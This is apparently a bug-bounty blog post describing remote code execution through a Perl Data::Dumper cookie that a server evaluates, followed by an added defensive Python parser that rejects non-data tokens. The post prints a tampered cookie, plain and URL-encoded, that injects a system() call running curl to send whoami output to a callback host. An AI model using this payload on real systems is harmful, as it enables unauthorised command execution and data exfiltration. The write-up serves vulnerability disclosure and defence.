Remote Code Execution via Cookie Manipulation

Geni_Wazir
3 min read · Dec 27, 2024

Remote Code Execution (RCE) is a common vulnerability, often stemming from file upload functionalities where users upload PHP files that get executed on the server. While the general concept of RCE and its potential risks are widely covered in many resources, I won’t be revisiting those details here. Instead, I’ll be focusing on a unique method I discovered while working on one of my recent projects.

The developer uses cookies to store sensitive data, such as session tokens, which are sent with each request for authentication and authorization. The developer also stores other frequently used information in cookies, which should be discarded once the session ends. There are several recommendations for using and configuring cookies, such as enabling the HttpOnly and Secure flags for sensitive cookies.

While browsing the webapp and inspecting the cookies, I discovered an interesting parameter named “portfolio” containing a URL-encoded value.

I decoded the value and discovered it was a PHP/Perl-style array code snippet; the $VAR1 = { ... }; form with undef values is the text format that Perl's Data::Dumper produces.

$VAR1 = {
  'deriv_by1' => '-',
  'strat' => [
    'curLoanBal'
  ],
  'non_mfdirected_loans' => 'checked',
  'mfdirected_loans' => 'checked',
  'df1' => 1,
  'isPercentOf' => undef,
  'includeDefeasedLoans' => 'checked',
  'weightingMethod' => 2,
  'deal_strat' => [
    'underwriter'
  ],
  'weightedAverages' => undef,
  'detailsort' => undef,
  'detailColumns' => [
    1,
    4
  ],
  'derivedLoanStatus_filter' => 'all troubled loans',
  'deriv_across1' => 'propTypeCode',
  'deriv_strat' => [
    'curLoanBal'
  ],
  'filterCommentaryStatus' => 'all'
};

At one point in the structure, I substituted a call to the built-in system function in order to execute a system command on the server.

$VAR1 = {
  'deriv_by1' => '-',
  'strat' => [
    system('curl https://burp-collaborator-url/`whoami`')
  ],
  'non_mfdirected_loans' => 'checked',
  'mfdirected_loans' => 'checked',
  'df1' => 1,
  'isPercentOf' => undef,
  'includeDefeasedLoans' => 'checked',
  'weightingMethod' => 2,
  'deal_strat' => [
    'underwriter'
  ],
  'weightedAverages' => undef,
  'detailsort' => undef,
  'detailColumns' => [
    1,
    4
  ],
  'derivedLoanStatus_filter' => 'all troubled loans',
  'deriv_across1' => 'propTypeCode',
  'deriv_strat' => [
    'curLoanBal'
  ],
  'filterCommentaryStatus' => 'all'
};

I then re-encoded it using a URL encoder.

%24VAR1%20%3D%20%7B%0A%20%20%27deriv_by1%27%20%3D%3E%20%27-%27%2C%0A%20%20%27strat%27%20%3D%3E%20%5B%0A%20%20%20%20system%28%27curl%20https%3A%2F%2Fburp-collaborator-url%2F%60whoami%60%27%29%0A%20%20%5D%2C%0A%20%20%27non_mfdirected_loans%27%20%3D%3E%20%27checked%27%2C%0A%20%20%27mfdirected_loans%27%20%3D%3E%20%27checked%27%2C%0A%20%20%27df1%27%20%3D%3E%201%2C%0A%20%20%27isPercentOf%27%20%3D%3E%20undef%2C%0A%20%20%27includeDefeasedLoans%27%20%3D%3E%20%27checked%27%2C%0A%20%20%27weightingMethod%27%20%3D%3E%202%2C%0A%20%20%27deal_strat%27%20%3D%3E%20%5B%0A%20%20%20%20%27underwriter%27%0A%20%20%5D%2C%0A%20%20%27weightedAverages%27%20%3D%3E%20undef%2C%0A%20%20%27detailsort%27%20%3D%3E%20undef%2C%0A%20%20%27detailColumns%27%20%3D%3E%20%5B%0A%20%20%20%201%2C%0A%20%20%20%204%0A%20%20%5D%2C%0A%20%20%27derivedLoanStatus_filter%27%20%3D%3E%20%27all%20troubled%20loans%27%2C%0A%20%20%27deriv_across1%27%20%3D%3E%20%27propTypeCode%27%2C%0A%20%20%27deriv_strat%27%20%3D%3E%20%5B%0A%20%20%20%20%27curLoanBal%27%0A%20%20%5D%2C%0A%20%20%27filterCommentaryStatus%27%20%3D%3E%20%27all%27%0A%7D%3B

I replaced the ‘portfolio’ cookie with the re-encoded value and forwarded the intercepted request in Burp.

The response was a 500 error, but checking the Collaborator brought a sense of satisfaction: the callback had arrived.

By manipulating the cookie, I successfully executed system commands. To confirm with certainty, I tested additional commands, such as retrieving the hostname, local IPs, and a few others.
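The root cause here is a server that turns the cookie text back into a data structure by evaluating it, so any code placed in the cookie runs. As an added illustration (not code from this post or from the affected application), the following Python parses the Data::Dumper-style $VAR1 format purely as data: every token must be a quoted string, an integer, undef or hash/array punctuation, and anything else, such as the system(...) call above, is rejected before a value is built. The cookie samples are constructed to mirror the write-up, and parse_portfolio is an assumed name.

```python
import re
from urllib.parse import quote, unquote
# Data tokens only: quoted strings, integers, undef and hash/array punctuation. The final
# `\S` turns any other character (the `s` of `system`, a `(`, a backtick) into a
# one-character token that the parser refuses, so nothing that looks like code is accepted.
TOKEN = re.compile(r"'(?:[^'\\]|\\.)*'|-?\d+\b|undef\b|=>|[{}\[\],]|\S")
class UnsafeCookie(ValueError):
    """The cookie holds something other than literal data."""
def _pop(toks, expect=None):  # next token; fails on end of input or an unexpected token
    if not toks or (expect is not None and toks[0] != expect):
        raise UnsafeCookie(f"expected {expect or 'a value'}, got {toks[:1]}")
    return toks.pop(0)
def _value(toks):  # recursive descent over the token queue; consumes exactly one value
    t = _pop(toks)
    if len(t) > 1 and t[0] == "'":                  # quoted string literal
        return t[1:-1].replace("\\'", "'").replace("\\\\", "\\")
    if t.lstrip("-").isdecimal():                   # integer literal
        return int(t)
    if t == "undef":
        return None
    if t not in ("{", "["):                         # anything else is code, not data
        raise UnsafeCookie(f"non-data token {t!r}")
    close, out = ("}", {}) if t == "{" else ("]", [])
    while toks and toks[0] != close:
        item = _value(toks)
        if t == "[":
            out.append(item)
        elif isinstance(item, str):
            _pop(toks, "=>")
            out[item] = _value(toks)
        else:
            raise UnsafeCookie("hash key is not a string")
    _pop(toks, close)
    return out
def parse_portfolio(cookie_value):  # -> (data, None) or (None, reason); nothing is ever eval'd
    try:
        m = re.fullmatch(r"\$VAR1\s*=\s*(.*?)\s*;?", unquote(cookie_value).strip(), re.S)
        if not m:
            raise UnsafeCookie("not a $VAR1 dump")
        toks = [t for t in TOKEN.findall(m.group(1)) if t != ","]  # commas carry no data
        data = _value(toks)
        if toks:
            raise UnsafeCookie(f"trailing tokens {toks[:3]}")
        return data, None
    except UnsafeCookie as err:
        return None, str(err)
# Constructed samples mirroring the write-up: the legitimate cookie and the tampered one.
GOOD_COOKIE = quote("$VAR1 = {\n  'strat' => [\n    'curLoanBal'\n  ],\n  'df1' => 1,\n  'isPercentOf' => undef\n};")
BAD_COOKIE = GOOD_COOKIE.replace(quote("'curLoanBal'"), quote("system('curl https://burp-collaborator-url/`whoami`')"))
```

The same check can run as a detection rule over request logs: a 'portfolio' value that fails to parse as pure data is a tampering signal. The durable fix is for the application never to evaluate cookie content at all and to carry such state in a data-only format with an integrity check.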

This was an incredible discovery that taught me the importance of thinking outside the box and exploring every possible area. Bugs aren’t always found along the usual paths; you need to innovate and experiment. Even if there’s only a 0.1% chance of success, it’s worth pursuing.

Written by Geni_Wazir

OSCP | CEH | OCI Associate | Cybersecurity Enthusiast | Security Researcher | Bug Hunter | Speaker at Walt Design | Always Exploring New Frontiers in Security
